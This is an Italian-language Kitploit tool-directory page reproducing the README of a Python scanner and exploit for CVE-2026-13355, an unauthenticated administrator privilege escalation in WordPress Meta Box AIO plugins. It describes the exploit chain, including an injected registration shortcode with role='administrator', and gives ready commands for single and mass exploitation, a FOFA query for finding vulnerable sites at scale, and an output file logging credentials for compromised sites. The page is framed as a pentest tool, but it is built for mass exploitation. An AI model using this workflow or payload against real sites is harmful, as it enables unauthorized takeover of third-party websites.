Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-13355 — Scanner PoC ed exploit in Python per CVE-2026-13355, un'escalation di privilegi admin non autenticata nei plugin WordPress Meta Box AIO, con scansione di massa FOFA. | Kitploit
Strumenti/GitHubGitHub/murrez/cve-2026-13355
Escalation di PrivilegiRicognizioneScanner di VulnerabilitàExploitScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurrez/cve-2026-13355

CVE-2026-13355

Scanner PoC ed exploit in Python per CVE-2026-13355, un'escalation di privilegi admin non autenticata nei plugin WordPress Meta Box AIO, con scansione di massa FOFA.

42 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2026-13355 — Escalatione di privilegi ad amministratore non autenticato in Meta Box AIO

Scanner e exploit proof-of-concept in Python 3 per CVE-2026-13355 nel bundle WordPress Meta Box AIO (e nelle estensioni correlate MB Frontend Submission / MB User Profile).

PiattaformaPlugin WordPress
ComponenteMeta Box AIO
AffettoMeta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0
Corretto inMeta Box AIO 3.12.0+ (autorizzazione di Form::process())
CVSS9.8 Critico
AutenticazioneNon autenticato
CWECWE-269 — Gestione impropria dei privilegi
Ricercatoreh0xilo (Wordfence)

Riepilogo

Difetti concatenati in due estensioni incluse nel bundle consentono la creazione non autenticata di un account amministratore:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id sovrascrive il target del form senza autenticazione; Form::process() omette user_can_edit(), quindi gli attaccanti possono eseguire wp_update_post() e sovrascrivere post_content su post/pagine arbitrari.
  2. MB User Profile (mbup) — Gli attributi iniettati dello shortcode [mb_user_profile_register role="administrator" auto_login="true"] vengono considerati attendibili senza validazione del ruolo.

Importante: La catena di exploit richiede un form mbfs (frontend submission) pubblico, non form mbup accessibili solo dopo il login. Molti risultati FOFA espongono solo l'interfaccia di login/registrazione mbup — questi vengono contrassegnati come plugin_mbup_only, non sfruttabili tramite questa catena.

Requisiti

  • Python 3.8+
  • pip install -r requirements.txt

Avvio rapido

root@kitploit:~
pip install -r requirements.txt

# Singolo target — check (flusso live nel terminale per impostazione predefinita)
python poc.py -u https://target.example --mode check

# Check massivo (una riga per target a meno di --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Singolo target — exploit (richiede URL del form mbfs + ID del post)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Exploit massivo dall'output del check
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → lista di target

Query di esempio:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

Normalizzare un export CSV di FOFA:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# scrive list.txt + CSV normalizzato (solo locale, in gitignore)
python poc.py --list list.txt --mode check --threads 20

Opzioni CLI

File di output

Usare --vuln-list exploited.txt nelle esecuzioni di exploit in modo che gli hit del check in hits.txt non vengano sovrascritti.

Valori di status del check

Note sull'exploit

  • La fase di poisoning invia post_content tramite un form mbfs con ?rwmb_frontend_field_object_id=<id>.
  • Il successo richiede che lo shortcode iniettato venga renderizzato sulla pagina avvelenata (nessuno strip/KSES, plugin non corretto, tipo di form errato).
  • I form mbfs di contatto/newsletter spesso non hanno un campo post_content reale; la sovrascrittura potrebbe comunque fallire nella pratica.
  • Un HTTP 403 sul POST di solito indica un blocco da WAF/host.

Struttura del repository

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Le liste di scansione locali e gli artefatti di esecuzione (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) sono in .gitignore e non devono essere committati.

Riferimenti

  • NVD — CVE-2026-13355
  • Wordfence advisory
  • Meta Box AIO changelog

Legale

Solo per test di sicurezza autorizzati e scopi educativi. Sei responsabile del rispetto delle leggi applicabili e delle regole del programma.

Scarica lo strumento
OpzioneDescrizione
-u, --urlURL di base singolo
--listLista di URL, CSV normalizzato FOFA (colonna url), o candidates.jsonl
--modecheck o exploit
--form-urlPagina con [mb_frontend_form ...] / mbfs-form
--object-idID del post/pagina per rwmb_frontend_field_object_id
--pathsPercorsi aggiuntivi da scansionare per form frontend
--username, --email, --passwordCredenziali di registrazione (exploit)
--shortcodePayload iniettato in post_content (shortcode di registrazione admin predefinito)
--verifyConferma tramite /wp-admin/ o wp-login.php dopo la registrazione
--flowTrasmetti una riga per target nelle esecuzioni massive (predefinito con --list)
--no-flowSolo riepilogo di avanzamento
--quiet, -qOutput console minimo
--threads, -jConcorrenza massiva (predefinito 15)
--outputLog JSONL (predefinito cve_2026_13355_results.jsonl)
--vuln-listRighe di hit / exploit in testo (predefinito hits.txt / usare exploited.txt per l'exploit)
--candidates-listJSONL di metadati del check (predefinito candidates.jsonl)
FileModalitàContenuto
cve_2026_13355_results.jsonlentrambeJSON completo per target
hits.txtcheckURL con candidate_mbfs
candidates.jsonlcheckform_url, object_id, indizi di versione
exploited.txtexploiturl|user|email|pass|oid=…
StatoSignificato
candidate_mbfsPlugin presente + form MB Frontend Submission trovato (exploit possibile)
plugin_mbup_onlySolo form di login/registrazione di User Profile — non questa catena CVE
plugin_no_frontend_formsFingerprint del plugin, nessun form frontend rwmb scoperto
patchedVersione superiore all'intervallo affetto (quando leggibile)
no_pluginMeta Box AIO / estensioni non rilevate